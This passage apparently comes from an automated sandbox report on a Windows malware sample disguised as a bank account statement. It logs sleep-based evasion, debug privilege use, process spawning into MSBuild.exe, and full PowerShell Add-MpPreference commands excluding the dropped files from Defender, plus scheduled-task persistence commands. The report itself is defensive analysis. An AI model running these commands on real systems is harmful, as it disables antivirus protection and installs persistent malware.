            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -597437s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -597328s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -597219s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -597109s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -597000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596890s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596781s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596672s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596562s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596453s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596344s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596234s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596125s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -596016s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595906s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595764s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595656s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595547s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595436s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595328s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595219s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -595094s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594984s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594875s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594765s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594656s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594547s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594437s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594328s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594218s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594109s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -594000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7804Thread sleep time: -593889s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599321Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598874Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598650Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598421Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597655Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597546Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597201Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597090Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596852Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596692Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596524Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596203Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596072Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595836Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595171Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594952Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594296Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594187Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594078Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593968Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593858Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599672
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599234
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599125
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599015
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598906
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598797
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598687
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598578
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598469
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598295
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598187
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597555
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597219
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597109
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596781
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596672
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596344
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596234
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596125
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595906
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595764
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595656
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595547
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595436
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595219
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595094
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594984
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594875
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594656
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594547
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594328
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594218
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594109
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593889
            Source: MSBuild.exe, 00000009.00000002.4699262471.0000000001116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
            Source: MSBuild.exe, 00000010.00000002.4699689315.0000000000FBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06757588 LdrInitializeThunk,9_2_06757588
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
